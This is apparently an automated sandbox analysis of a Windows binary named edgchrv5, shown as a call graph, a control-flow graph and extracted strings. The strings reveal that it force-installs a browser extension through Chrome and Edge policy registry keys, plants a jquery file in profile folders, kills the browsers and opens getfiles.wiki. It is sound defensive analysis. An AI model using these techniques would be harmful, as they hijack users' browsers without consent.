FindNextFileW 11836 100217b FindClose 11835->11836 11835->11848 11837 1002188 _memset 11836->11837 11838 1002b10 103 API calls 11837->11838 11839 10021cc GetFileAttributesW 11838->11839 11840 10021ed RegOpenKeyExW 11839->11840 11842 100221b RegOpenKeyExW 11840->11842 11844 1002282 RegOpenKeyExW 11842->11844 11847 10022e3 RegOpenKeyExW 11844->11847 11846 1002b40 69 API calls 11846->11848 11851 10023a6 RegOpenKeyExW 11847->11851 11848->11835 11848->11837 11848->11846 11850 100215e 11848->11850 11850->11835 11853 10023d4 ShellExecuteW Sleep 11851->11853 11855 100243e 11853->11855 11856 1002b10 103 API calls 11855->11856 11857 1002455 FindFirstFileW 11856->11857 11859 1002487 11857->11859 11860 1002b10 103 API calls 11859->11860 11861 100249f GetFileAttributesW 11860->11861 11863 1002554 11861->11863 11864 100265a FindNextFileW 11863->11864 11864->11863 11865 1002676 11864->11865 11866 1002b10 103 API calls 11865->11866 11867 10026a8 11866->11867 11868 1002b10 103 API calls 11867->11868 11899 1001d01 11898->11899 11900 1001270 5 API calls 11899->11900 11901 1001d1c 11900->11901 11902 1001270 5 API calls 11901->11902 11903 1001d3b 11902->11903 11904 1001270 5 API calls 11903->11904 11905 1001d5b 11904->11905 11906 1001270 5 API calls 11905->11906 11907 1001d7a 11906->11907 11908 1001330 116 API calls 11907->11908 11909 1001d90 Sleep 11908->11909 11922 1001da5 11909->11922 11911 1001ed2 Sleep 11912 1001edf 11911->11912 11914 1001270 5 API calls 11912->11914 11913 1002b10 103 API calls 11913->11922 11915 1001efb 11914->11915 11916 1001270 5 API calls 11915->11916 11917 1001f19 Sleep 11916->11917 11919 1001330 116 API calls 11917->11919 11918 1001ea2 GetFileAttributesW 11918->11922 11920 1001f35 11919->11920 11925 1002b7c ___convertcp 5 API calls 11920->11925 11921 1001ec0 Sleep 11921->11922 11922->11911 11922->11913 11922->11918 11922->11921 11927 1001e93 11922->11927 11923 100215f FindNextFileW 11924 100217b FindClose 11923->11924 11923->11927 11928 1002188 _memset 11924->11928 11926 1001f47 11925->11926 11926->10965 11927->11923 11932 1002b40 69 API calls 11927->11932 11929 1002b10 103 API calls 11928->11929 11930 10021cc GetFileAttributesW 11929->11930 11931 10021ed RegOpenKeyExW 11930->11931 11934 100221b RegOpenKeyExW 11931->11934 11932->11927 11936 1002282 RegOpenKeyExW 11934->11936 11938 10022e3 RegOpenKeyExW 11936->11938 11940 10023a6 RegOpenKeyExW 11938->11940 11942 10023d4 ShellExecuteW Sleep 11940->11942 11944 100243e 11942->11944 11945 1002b10 103 API calls 11944->11945 11988 10018df RegOpenKeyExW 11987->11988 11989 10018fd RegOpenKeyExW 11988->11989 11991 1001978 RegOpenKeyExW 11989->11991 11993 1001a27 ShellExecuteW 11991->11993 11995 1001a4e Sleep 11993->11995 11996 1001a5e 11995->11996 11997 1002b10 103 API calls 11996->11997 11998 1001a76 FindFirstFileW 11997->11998 12000 1001a9d 11998->12000 12001 1002b10 103 API calls 12000->12001 12002 1001abe GetFileAttributesW 12001->12002 12003 1001b75 12002->12003 12004 1001c6d FindNextFileW 12003->12004 12004->12003 12005 1001c89 12004->12005 12006 1002b10 103 API calls 12005->12006 12007 1001cbb 12006->12007 12008 1002b10 103 API calls 12007->12008 12009 1001cdb 12008->12009 12010 1001270 5 API calls 12009->12010 12011 1001cfc 12010->12011 12012 1001270 5 API calls 12011->12012 12013 1001d1c 12012->12013 12014 1001270 5 API calls 12013->12014 12015 1001d3b 12014->12015 12016 1001270 5 API calls 12015->12016 12017 1001d5b 12016->12017 12108 1001ff5 12099->12108 12100 100215f FindNextFileW 12101 100217b FindClose 12100->12101 12100->12108 12102 1002188 _memset 12101->12102 12103 1002b10 103 API calls 12102->12103 12104 10021cc GetFileAttributesW 12103->12104 12105 10021ed RegOpenKeyExW 12104->12105 12107 100221b RegOpenKeyExW 12105->12107 12111 1002282 RegOpenKeyExW 12107->12111 12108->12100 12109 1002b40 69 API calls 12108->12109 12109->12108 12113 10022e3 RegOpenKeyExW 12111->12113 12115 10023a6 RegOpenKeyExW 12113->12115 12117 10023d4 ShellExecuteW Sleep 12115->12117 12119 100243e 12117->12119 12120 1002b10 103 API calls 12119->12120 12121 1002455 FindFirstFileW 12120->12121 12123 1002487 12121->12123 12124 1002b10 103 API calls 12123->12124 12125 100249f GetFileAttributesW 12124->12125 12127 1002554 12125->12127 12128 100265a FindNextFileW 12127->12128 12128->12127 12129 1002676 12128->12129 12130 1002b10 103 API calls 12129->12130 12131 10026a8 12130->12131 12132 1002b10 103 API calls 12131->12132 12133 10026c3 12132->12133 12134 1001270 5 API calls 12133->12134 12163 1001a1d ShellExecuteW 12162->12163 12165 1001a4e Sleep 12163->12165 12166 1001a5e 12165->12166 12167 1002b10 103 API calls 12166->12167 12168 1001a76 FindFirstFileW 12167->12168 12170 1001a9d 12168->12170 12171 1002b10 103 API calls 12170->12171 12172 1001abe GetFileAttributesW 12171->12172 12173 1001b75 12172->12173 12174 1001c6d FindNextFileW 12173->12174 12174->12173 12175 1001c89 12174->12175 12176 1002b10 103 API calls 12175->12176 12177 1001cbb 12176->12177 12178 1002b10 103 API calls 12177->12178 12179 1001cdb 12178->12179 12180 1001270 5 API calls 12179->12180 12181 1001cfc 12180->12181 12182 1001270 5 API calls 12181->12182 12183 1001d1c 12182->12183 12184 1001270 5 API calls 12183->12184 12185 1001d3b 12184->12185 12186 1001270 5 API calls 12185->12186 12187 1001d5b 12186->12187 12188 1001270 5 API calls 12187->12188 12189 1001d7a 12188->12189 12190 1001330 116 API calls 12189->12190 12270 100175c SHGetSpecialFolderPathW 12269->12270 12271 1001772 12270->12271 12272 1002b10 103 API calls 12271->12272 12273 10017eb GetFileAttributesW 12272->12273 12275 1001811 RegOpenKeyExW 12273->12275 12277 1001840 RegOpenKeyExW 12275->12277 12279 10018a5 RegOpenKeyExW 12277->12279 12281 1001900 RegOpenKeyExW 12279->12281 12283 1001978 RegOpenKeyExW 12281->12283 12285 1001a27 ShellExecuteW 12283->12285 12287 1001a4e Sleep 12285->12287 12288 1001a5e 12287->12288 12289 1002b10 103 API calls 12288->12289 12290 1001a76 FindFirstFileW 12289->12290 12292 1001a9d 12290->12292 12293 1002b10 103 API calls 12292->12293 12294 1001abe GetFileAttributesW 12293->12294 12295 1001b75 12294->12295 12296 1001c6d FindNextFileW 12295->12296 12296->12295 12297 1001c89 12296->12297 12298 1002b10 103 API calls 12297->12298 12299 1001cbb 12298->12299 12300 1002b10 103 API calls 12299->12300 12301 1001cdb 12300->12301 12302 1001270 5 API calls 12301->12302 12303 1001cfc 12302->12303 12304 1001270 5 API calls 12303->12304 12392 10021aa _memset 12391->12392 12393 1002b10 103 API calls 12392->12393 12394 10021cc GetFileAttributesW 12393->12394 12395 10021ed RegOpenKeyExW 12394->12395 12397 100221b RegOpenKeyExW 12395->12397 12399 1002282 RegOpenKeyExW 12397->12399 12401 10022e3 RegOpenKeyExW 12399->12401 12403 10023a6 RegOpenKeyExW 12401->12403 12405 10023d4 ShellExecuteW Sleep 12403->12405 12407 100243e 12405->12407 12408 1002b10 103 API calls 12407->12408 12409 1002455 FindFirstFileW 12408->12409 12411 1002487 12409->12411 12412 1002b10 103 API calls 12411->12412 12413 100249f GetFileAttributesW 12412->12413 12415 1002554 12413->12415 12416 100265a FindNextFileW 12415->12416 12416->12415 12417 1002676 12416->12417 12418 1002b10 103 API calls 12417->12418 12419 10026a8 12418->12419 12420 1002b10 103 API calls 12419->12420 12421 10026c3 12420->12421 12422 1001270 5 API calls 12421->12422 12423 10026e4 12422->12423 12424 1001270 5 API calls 12423->12424 12425 1002704 12424->12425 12426 1001270 5 API calls 12425->12426 12451 10017fb 12450->12451 12452 1001816 RegOpenKeyExW 12451->12452 12502 1001805 12451->12502 12453 1001840 RegOpenKeyExW 12452->12453 12457 10018a5 RegOpenKeyExW 12453->12457 12454 1002b7c ___convertcp 5 API calls 12455 1001f47 12454->12455 12455->10965 12459 1001900 RegOpenKeyExW 12457->12459 12461 1001978 RegOpenKeyExW 12459->12461 12463 1001a27 ShellExecuteW 12461->12463 12465 1001a4e Sleep 12463->12465 12466 1001a5e 12465->12466 12467 1002b10 103 API calls 12466->12467 12468 1001a76 FindFirstFileW 12467->12468 12470 1001a9d 12468->12470 12471 1002b10 103 API calls 12470->12471 12472 1001abe GetFileAttributesW 12471->12472 12473 1001b75 12472->12473 12474 1001c6d FindNextFileW 12473->12474 12474->12473 12475 1001c89 12474->12475 12476 1002b10 103 API calls 12475->12476 12477 1001cbb 12476->12477 12478 1002b10 103 API calls 12477->12478 12479 1001cdb 12478->12479 12480 1001270 5 API calls 12479->12480 12481 1001cfc 12480->12481 12482 1001270 5 API calls 12481->12482 12483 1001d1c 12482->12483 12484 1001270 5 API calls 12483->12484 12485 1001d3b 12484->12485 12502->12454 12568 1001dd9 12567->12568 12569 1002b10 103 API calls 12568->12569 12570 1001dff ShellExecuteW 12569->12570 12574 1001db1 12570->12574 12572 1001ed2 Sleep 12573 1001edf 12572->12573 12576 1001270 5 API calls 12573->12576 12574->12572 12575 1002b10 103 API calls 12574->12575 12580 1001ea2 GetFileAttributesW 12574->12580 12583 1001ec0 Sleep 12574->12583 12588 1001e93 12574->12588 12575->12574 12577 1001efb 12576->12577 12578 1001270 5 API calls 12577->12578 12579 1001f19 Sleep 12578->12579 12581 1001330 116 API calls 12579->12581 12580->12574 12582 1001f35 12581->12582 12586 1002b7c ___convertcp 5 API calls 12582->12586 12583->12574 12584 100215f FindNextFileW 12585 100217b FindClose 12584->12585 12584->12588 12589 1002188 _memset 12585->12589 12587 1001f47 12586->12587 12587->10965 12588->12584 12593 1002b40 69 API calls 12588->12593 12590 1002b10 103 API calls 12589->12590 12591 10021cc GetFileAttributesW 12590->12591 12592 10021ed RegOpenKeyExW 12591->12592 12595 100221b RegOpenKeyExW 12592->12595 12593->12588 12597 1002282 RegOpenKeyExW 12595->12597 12599 10022e3 RegOpenKeyExW 12597->12599 12601 10023a6 RegOpenKeyExW 12599->12601 12603 10023d4 ShellExecuteW Sleep 12601->12603 12605 100243e 12603->12605 12606 1002b10 103 API calls 12605->12606 12607 1002455 FindFirstFileW 12606->12607 12609 1002487 12607->12609 12610 1002b10 103 API calls 12609->12610 12611 100249f GetFileAttributesW 12610->12611 12613 1002554 12611->12613 12614 100265a FindNextFileW 12613->12614 12614->12613 12615 1002676 12614->12615 12616 1002b10 103 API calls 12615->12616 12617 10026a8 12616->12617 12649 1001d95 Sleep 12648->12649 12650 1001da5 12649->12650 12651 1001ed2 Sleep 12650->12651 12653 1002b10 103 API calls 12650->12653 12658 1001ea2 GetFileAttributesW 12650->12658 12661 1001ec0 Sleep 12650->12661 12666 1001e93 12650->12666 12652 1001edf 12651->12652 12654 1001270 5 API calls 12652->12654 12653->12650 12655 1001efb 12654->12655 12656 1001270 5 API calls 12655->12656 12657 1001f19 Sleep 12656->12657 12659 1001330 116 API calls 12657->12659 12658->12650 12660 1001f35 12659->12660 12664 1002b7c ___convertcp 5 API calls 12660->12664 12661->12650 12662 100215f FindNextFileW 12663 100217b FindClose 12662->12663 12662->12666 12667 1002188 _memset 12663->12667 12665 1001f47 12664->12665 12665->10965 12666->12662 12671 1002b40 69 API calls 12666->12671 12668 1002b10 103 API calls 12667->12668 12669 10021cc GetFileAttributesW 12668->12669 12670 10021ed RegOpenKeyExW 12669->12670 12673 100221b RegOpenKeyExW 12670->12673 12671->12666 12675 1002282 RegOpenKeyExW 12673->12675 12677 10022e3 RegOpenKeyExW 12675->12677 12679 10023a6 RegOpenKeyExW 12677->12679 12681 10023d4 ShellExecuteW Sleep 12679->12681 12683 100243e 12681->12683 12684 1002b10 103 API calls 12683->12684 12685 1002455 FindFirstFileW 12684->12685 12687 1002487 12685->12687 12688 1002b10 103 API calls 12687->12688 12689 100249f GetFileAttributesW 12688->12689 12691 1002554 12689->12691 12692 100265a FindNextFileW 12691->12692 12692->12691 12693 1002676 12692->12693 12694 1002b10 103 API calls 12693->12694 12695 10026a8 12694->12695 12696 1002b10 103 API calls 12695->12696 12697 10026c3 12696->12697 12727 1001956 RegOpenKeyExW 12726->12727 12728 1001978 RegOpenKeyExW 12727->12728 12731 1001974 12727->12731 12730 1001a27 ShellExecuteW 12728->12730 12734 1001a4e Sleep 12730->12734 12731->12728 12733 1001986 RegDeleteValueW 12731->12733 12736 1001985 12731->12736 12737 100199a 12733->12737 12738 100199d RegDeleteValueW 12733->12738 12735 1001a5e 12734->12735 12739 1002b10 103 API calls 12735->12739 12737->12738 12740 10019b1 RegCloseKey 12738->12740 12741 1001a76 FindFirstFileW 12739->12741 12740->12728 12745 10019c4 12740->12745 12744 1001a9d 12741->12744 12746 1002b10 103 API calls 12744->12746 12745->12728 12747 1001abe GetFileAttributesW 12746->12747 12748 1001b75 12747->12748 12749 1001c6d FindNextFileW 12748->12749 12749->12748 12750 1001c89 12749->12750 12751 1002b10 103 API calls 12750->12751 12752 1001cbb 12751->12752 12753 1002b10 103 API calls 12752->12753 12754 1001cdb 12753->12754 12755 1001270 5 API calls 12754->12755 12756 1001cfc 12755->12756 12757 1001270 5 API calls 12756->12757 12758 1001d1c 12757->12758 12759 1001270 5 API calls 12758->12759 12760 1001d3b 12759->12760 12761 1001270 5 API calls 12760->12761 12762 1001d5b 12761->12762 12763 1001270 5 API calls 12762->12763 12845 10019d4 RegOpenKeyExW 12844->12845 12846 1001a25 ShellExecuteW 12845->12846 12847 10019f9 12845->12847 12853 1001a4e Sleep 12846->12853 12848 10019fc RegDeleteKeyW 12847->12848 12849 10019fe RegDeleteKeyW 12847->12849 12851 1001a13 12848->12851 12852 1001a15 RegCloseKey 12848->12852 12849->12851 12849->12852 12852->12846 12854 1001a5e 12853->12854 12856 1002b10 103 API calls 12854->12856 12857 1001a76 FindFirstFileW 12856->12857 12859 1001a9d 12857->12859 12860 1002b10 103 API calls 12859->12860 12861 1001abe GetFileAttributesW 12860->12861 12862 1001b75 12861->12862 12863 1001c6d FindNextFileW 12862->12863 12863->12862 12864 1001c89 12863->12864 12865 1002b10 103 API calls 12864->12865 12866 1001cbb 12865->12866 12867 1002b10 103 API calls 12866->12867 12868 1001cdb 12867->12868 12869 1001270 5 API calls 12868->12869 12870 1001cfc 12869->12870 12871 1001270 5 API calls 12870->12871 12872 1001d1c 12871->12872 12873 1001270 5 API calls 12872->12873 12874 1001d3b 12873->12874 12875 1001270 5 API calls 12874->12875 12876 1001d5b 12875->12876 12877 1001270 5 API calls 12876->12877 12878 1001d7a 12877->12878 12879 1001330 116 API calls 12878->12879 12959 1001dd2 12958->12959 12960 1002b10 103 API calls 12959->12960 12961 1001dff ShellExecuteW 12960->12961 12971 1001db1 12961->12971 12963 1001ed2 Sleep 12964 1001edf 12963->12964 12966 1001270 5 API calls 12964->12966 12965 1002b10 103 API calls 12965->12971 12967 1001efb 12966->12967 12968 1001270 5 API calls 12967->12968 12969 1001f19 Sleep 12968->12969 12972 1001330 116 API calls 12969->12972 12970 1001ea2 GetFileAttributesW 12970->12971 12971->12963 12971->12965 12971->12970 12973 1001ec0 Sleep 12971->12973 12979 1001e93 12971->12979 12974 1001f35 12972->12974 12973->12971 12977 1002b7c ___convertcp 5 API calls 12974->12977 12975 100215f FindNextFileW 12976 100217b FindClose 12975->12976 12975->12979 12980 1002188 _memset 12976->12980 12978 1001f47 12977->12978 12978->10965 12979->12975 12984 1002b40 69 API calls 12979->12984 12981 1002b10 103 API calls 12980->12981 12982 10021cc GetFileAttributesW 12981->12982 12983 10021ed RegOpenKeyExW 12982->12983 12986 100221b RegOpenKeyExW 12983->12986 12984->12979 12988 1002282 RegOpenKeyExW 12986->12988 12990 10022e3 RegOpenKeyExW 12988->12990 12992 10023a6 RegOpenKeyExW 12990->12992 12994 10023d4 ShellExecuteW Sleep 12992->12994 12996 100243e 12994->12996 12997 1002b10 103 API calls 12996->12997 12998 1002455 FindFirstFileW 12997->12998 13000 1002487 12998->13000 13001 1002b10 103 API calls 13000->13001 13002 100249f GetFileAttributesW 13001->13002 13004 1002554 13002->13004 13005 100265a FindNextFileW 13004->13005 13005->13004 13006 1002676 13005->13006 13007 1002b10 103 API calls 13006->13007 13008 10026a8 13007->13008 13043 1002bfa __IsNonwritableInCurrentImage 13039->13043 13040 10034ef __getptd_noexit 69 API calls 13041 1002c14 13040->13041 13042 1002c1f ExitThread 13041->13042 13107 10036b1 13041->13107 13043->13040 13047 1001279 13046->13047 13073 1001200 13047->13073 13051 10012af RegSetValueExW 13053 1001304 13051->13053 13054 1001306 RegCloseKey 13051->13054 13053->13054 13055 1001316 13054->13055 13055->11000 13057 100134a _memset 13056->13057 13058 100136a CreateProcessW 13057->13058 13061 100139c 13058->13061 13059 10013a5 13059->11006 13060 10013b0 WaitForSingleObject 13062 10013c2 GetExitCodeProcess 13060->13062 13063 10013be 13060->13063 13061->13059 13061->13060 13064 10013d5 13062->13064 13065 10013d8 CloseHandle CloseHandle 13062->13065 13063->13062 13064->13065 13066 10013d7 13064->13066 13068 10013ee 13065->13068 13066->13065 13067 10013f7 13067->13059 13068->13067 13082 10015bc 13068->13082 13071 1002f3d __wsetenvp 69 API calls 13070->13071 13072 1002b55 13071->13072 13072->11008 13074 1001209 RegOpenKeyExW 13073->13074 13075 100120b RegOpenKeyExW 13073->13075 13078 1001229 13074->13078 13075->13078 13077 100125d RegOpenKeyExW 13077->13051 13078->13077 13079 1001237 RegCreateKeyExW 13078->13079 13080 1001236 RegCreateKeyExW 13078->13080 13079->13077 13080->13077 13083 10015be 13082->13083 13086 10015bf 13082->13086 13083->13083 13084 1001605 13085 1002b10 103 API calls 13084->13085 13086->13084 13088 10015e5 WriteFile 13086->13088 13090 10015f6 13088->13090 13091 10015f8 CloseHandle 13088->13091 13090->13091 13091->13084 13108 100370a 13107->13108 13109 10036bf 13107->13109 13110 1003714 TlsSetValue 13108->13110 13111 1002c1e 13108->13111 13112 10036c5 TlsGetValue 13109->13112 13115 10036e8 13109->13115 13110->13111 13111->13042 13113 10036d8 TlsGetValue 13112->13113 13112->13115 13113->13115 13114 10032df __decode_pointer 7 API calls 13116 10036ff 13114->13116 13115->13114 13118 1003582 13116->13118 13119 100358e __ioinit 13118->13119 13120 10035a6 13119->13120 13121 1003690 __ioinit 13119->13121 13122 1004117 ___free_lconv_num 69 API calls 13119->13122 13123 10035b4 13120->13123 13124 1004117 ___free_lconv_num 69 API calls 13120->13124 13121->13108 13122->13120 13125 10035c2 13123->13125 13127 1004117 ___free_lconv_num 69 API calls 13123->13127 13124->13123 13126 10035d0 13125->13126 13128 1004117 ___free_lconv_num 69 API calls 13125->13128 13129 1004117 ___free_lconv_num 69 API calls 13126->13129 13130 10035de 13126->13130 13127->13125 13128->13126 13129->13130 13131 10035ec 13130->13131 13132 1004117 ___free_lconv_num 69 API calls 13130->13132 13133 10035fa 13131->13133 13135 1004117 ___free_lconv_num 69 API calls 13131->13135 13132->13131 13134 100360b 13133->13134 13136 1004117 ___free_lconv_num 69 API calls 13133->13136 13137 1005cb2 __lock 69 API calls 13134->13137 13135->13133 13136->13134 13138 1003613 13137->13138 13139 1003638 13138->13139 13140 100361f InterlockedDecrement 13138->13140 13140->13139

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 1001740-1001785 call 100a7f0 SHGetSpecialFolderPathW 5 100178b-10017aa 0->5 5->5 6 10017ac-1001b75 call 1002b10 GetFileAttributesW RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 5->6 35 1001b7b-1001c83 call 1002b60 FindNextFileW 6->35 40 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 35->40 72 1001e4d-1001e59 40->72 73 1001ed2-1001edd Sleep 72->73 74 1001e5b 72->74 77 1001ee2-1001efc call 1001270 73->77 78 1001edf 73->78 75 1001e60-1001e8f call 1002b10 74->75 76 1001e5d 74->76 85 1001e91 75->85 86 1001e94-1001e9b 75->86 76->75 79 1001e5f 76->79 87 1001f00-1001f30 call 1001270 Sleep call 1001330 77->87 88 1001efe 77->88 78->77 81 1001ee1 78->81 79->75 81->77 85->86 90 1001e93 85->90 91 1001ecd 86->91 92 1001e9d 86->92 106 1001f35 87->106 88->87 95 1002050-1002058 90->95 91->72 96 1001ea2-1001eb2 GetFileAttributesW 92->96 97 1001e9f 92->97 98 100205a-1002070 95->98 99 100207e-1002083 95->99 102 1001eb4 96->102 103 1001ebb 96->103 97->96 101 1001ea1 97->101 104 1002072-100207c 98->104 105 1002018-1002031 98->105 109 1002089-100209c 99->109 101->96 110 1001eb6 102->110 111 1001eb9 102->111 107 1001ec0-1001ecb Sleep 103->107 108 1001ebd 103->108 104->109 105->99 118 1002033-100203b 105->118 113 1001f37 106->113 114 1001f3b-1001f4a call 1002b7c 106->114 107->86 108->107 115 1001ebf 108->115 116 10020a2-10020b2 109->116 117 100215f-1002175 FindNextFileW 109->117 110->111 112 1001eb8 110->112 111->91 112->111 113->114 119 1001f39 113->119 115->107 120 10020b8-10020d1 116->120 122 1001ff5-1001ffc 117->122 123 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 117->123 118->104 124 100203d-100204e 118->124 119->114 125 10020d3-10020db 120->125 126 100211e-1002123 120->126 122->117 129 1002002-1002012 122->129 145 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 123->145 124->95 130 1002112-100211c 125->130 131 10020dd-10020f8 125->131 133 1002129-100213c 126->133 129->105 130->133 131->126 135 10020fa-1002110 131->135 133->117 136 100213e 133->136 135->120 135->130 138 1002140 136->138 139 1002144-100215a call 1002b40 136->139 138->139 141 1002142 138->141 139->117 150 100215c 139->150 141->139 174 1002559-1002670 call 1002b60 FindNextFileW 145->174 150->117 152 100215e 150->152 152->117 179 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 174->179 210 100282f-100283b 179->210 211 10028b9 210->211 212 100283d-100283e 210->212 215 10028bb 211->215 216 10028be-10028ca Sleep 211->216 213 1002840 212->213 214 1002842-1002871 call 1002b10 212->214 213->214 224 1002873 214->224 225 1002876-10028b4 214->225 215->216 218 10028bd 215->218 219 10028cc 216->219 220 10028ce-1002900 call 1001270 * 2 216->220 218->216 219->220 232 1002902 220->232 233 1002906-1002912 Sleep 220->233 224->225 227 1002875 call 1002a33 224->227 225->210 227->225 232->233 234 1002904 232->234 235 1002914 233->235 236 1002916-1002928 call 1001330 233->236 234->233 235->236 239 100292a 236->239 240 100292c-100293b call 1002b7c 236->240 239->240
                                                                                                APIs
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,C:\Program Files,00000026,00000000), ref: 01001767
                                                                                                Strings
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002346
                                                                                                • SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D6B
                                                                                                • https://getfiles.wiki/welcome.php, xrefs: 01002415
                                                                                                • SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5
                                                                                                • version, xrefs: 0100274C
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 010028CE
                                                                                                • %s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001AAD
                                                                                                • SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D4C
                                                                                                • /F /IM msedge.exe /T, xrefs: 0100291D
                                                                                                • /IM chrome.exe, xrefs: 01001D86
                                                                                                • Profile , xrefs: 01001B80
                                                                                                • SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA
                                                                                                • SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002751
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 01002266
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 01001CE3
                                                                                                • SOFTWARE\Policies\Microsoft\Edge, xrefs: 010022C8
                                                                                                • version, xrefs: 0100270E
                                                                                                • SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 01001F0A
                                                                                                • %s\edge.crx, xrefs: 010026B2
                                                                                                • 1.0, xrefs: 01001D22
                                                                                                • SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002733
                                                                                                • SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D0D
                                                                                                • open, xrefs: 01001A3C
                                                                                                • %s\ServiceApp\apps-helper, xrefs: 01001CAA
                                                                                                • /IM msedge.exe, xrefs: 0100276C
                                                                                                • open, xrefs: 01002421
                                                                                                • Profile , xrefs: 0100255E
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002713
                                                                                                • C:\Program Files, xrefs: 01001760, 01001772, 010017D5
                                                                                                • %s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js, xrefs: 0100285D
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 010028D8
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 010026D5
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 010028E7
                                                                                                • %s\Google\Chrome\User Data\*.*, xrefs: 01001A65
                                                                                                • version, xrefs: 01001D66
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 010026CB
                                                                                                • 1.0, xrefs: 01002709
                                                                                                • path, xrefs: 01001D08
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions, xrefs: 010023B9
                                                                                                • %s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100248E
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 010026F5
                                                                                                • %s\Microsoft\Edge\User Data\*.*, xrefs: 01002444
                                                                                                • SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D2C
                                                                                                • SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 010028F1
                                                                                                • path, xrefs: 0100272E
                                                                                                • %s\Google\Chrome\Application\chrome.exe, xrefs: 010017DA
                                                                                                • path, xrefs: 01001D47
                                                                                                • %s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js, xrefs: 01001E7B
                                                                                                • path, xrefs: 010026F0
                                                                                                • SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A
                                                                                                • %s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB
                                                                                                • %s\ServiceApp\apps-helper, xrefs: 01002697
                                                                                                • 1.0, xrefs: 01002747
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 01001EEC
                                                                                                • %s\edge.crx, xrefs: 01001CCA
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 01001F00
                                                                                                • version, xrefs: 01001D27
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 01002200
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 01001EE2
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001824
                                                                                                • 1.0, xrefs: 01001D61
                                                                                                • /F /IM chrome.exe /T, xrefs: 01001F2B
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001CED
                                                                                                • https://getfiles.wiki/welcome.php, xrefs: 01001A30
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderPathSpecial
